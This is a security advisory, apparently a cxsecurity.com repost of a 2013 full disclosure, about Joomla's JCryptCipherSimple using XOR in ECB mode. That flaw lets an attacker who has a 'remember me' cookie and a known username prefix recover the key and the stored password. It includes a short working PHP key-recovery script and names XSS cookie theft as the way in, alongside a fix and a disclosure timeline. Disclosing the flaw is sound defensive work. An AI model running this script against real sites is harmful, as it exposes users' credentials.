Joomla 1.5.26, 2.5.11, 3.1.1 crypto vulnerability

2013-06-18 / 2013-06-19
Credit: Marco Beierer
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Vulnerable Application All current and past versions of Joomla (http://www.joomla.org) up to 1.5.26, 2.5.11, 3.1.1. Also the Joomla platform and maybe the Joomla framework (not tested). At the moment there is no vendor patch available. # The Problem The problem occurs in the implementation of JCryptCipherSimple. The JCryptCipherSimple encrypts a text with an simple XOR operation in the Electronic Codebook Mode (ECB). The ECB is insecure by design and normally just used for education purposes because of its simplicity. For the encryption, the plaintext is split into small blocks and encrypted block by block. Each block has the same length as the key. The mathematical equation for the encryption is: Ciphertext = Plaintext XOR Key If the ciphertext and at least one block of the plaintext is known, it is thus very easy to calculate the key. To calculate the key, the equation could be rearranged as follows: Key = Ciphertext XOR Plaintext So, if an attacker knows the plaintext corresponding to one block ciphertext, he is able to calculate the key and thus to decrypt the complete ciphertext. # An example in the Joomla core In the Joomla core the JCryptCipherSimple is used for the "remember me" function. There the serialized user credentials are encrypted with the JCryptCipherSimple. The serialized credentials look for example like this: a:2:{s:8:"username";s:12:"the_username";s:8:"password";s:12:"the_password";} The used key is 32 characters long. The first block to encrypt is thus: a:2:{s:8:"username";s:12:"the_us So the attacker must only know the beginning of the username of the victim to calculate the key and decrypt the second and third block (including the password of the victim). # Exploit the core vulnerability To exploit the vulnerability it is necessary to steal the "remember me" cookie of an user. This is for example possible through an XSS vulnerability. Then the key could be calculated with the script below. The script is written for the Joomla Platform 12.3. The used functions are identical with these used in the current versions of the CMS. To calculate the key it is necessary to set the variables $plaintext (known part of the credentials) and $ciphertext (content of the remember me cookie) and then execute the script. Maybe it is also necessary to adjust the path to the needed library files. # The exploit script require '../libraries/import.php'; require_once '../libraries/legacy/application/application.php'; class CalculateKey extends JApplicationCli { public function execute() { $plaintext = ''; // first part of serialized credentials $cyphertext = ''; // content of remember me cookie $key = new JCryptKey('simple', $plaintext, $plaintext); $crypt = new JCrypt(new JCryptCipherSimple, $key); $out = $crypt->decrypt($cyphertext); $out = substr($out, 0, 32); $this->out($out); } } JApplicationCli::getInstance('CalculateKey')->execute(); # What else? The JCryptCipherSimple may also be used by third party developers in their Joomla extensions, so there is an unknown number of vulnerable extensions. # Solution A solution to the problem would be to rewrite the JCryptCipherSimple to be non-deterministic. This could be achieved by using another mode of operation. An alternative is to use another by the Joomla core provided cipher and remove the JCryptCipherSimple. # History 2013.05.11 Vulnerability reported to the vendor 2013.05.12 Vendor asked for details 2013.05.12 Details and exploit provided to the vendor 2013.05.30 Asked vendor about the status of investigation (no response) 2013.06.11 Sent another mail to the vendor (no response) 2013.06.15 Full disclosure

References:

http://www.joomla.org
http://seclists.org/fulldisclosure/2013/Jun/149


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top